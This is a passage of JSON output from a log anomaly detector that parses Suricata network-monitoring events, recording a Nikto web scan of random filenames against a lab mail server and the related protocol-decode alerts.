"/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.x-shop\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.x-shop\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.x-shop", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.x-shop", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46962, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":319004384865496,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 319004384865496, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.373160+0000\",\"flow_id\":319004384865496,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.375251 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46964 -> 192.168.10.154:80", "/parser/model/time": 1583349514.375251, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46964, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.375251 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46964 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.dbc", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.375561+0000\",\"flow_id\":1672202550949310,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.375561, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1672202550949310,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.dbc\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.dbc\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.dbc", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.dbc", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46964, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1672202550949310,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1672202550949310, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.375561+0000\",\"flow_id\":1672202550949310,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46964,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dbc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.377295 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46966 -> 192.168.10.154:80", "/parser/model/time": 1583349514.377295, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46966, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.377295 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46966 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.map", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.377734+0000\",\"flow_id\":2176156833595140,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.377734, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2176156833595140,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.map\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.map\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.map", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.map", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46966, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2176156833595140,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2176156833595140, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.377734+0000\",\"flow_id\":2176156833595140,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46966,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.map\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.map\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.379849 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46968 -> 192.168.10.154:80", "/parser/model/time": 1583349514.379849, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46968, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.379849 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46968 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.Big5", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.380109+0000\",\"flow_id\":1414354189338696,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.380109, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1414354189338696,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 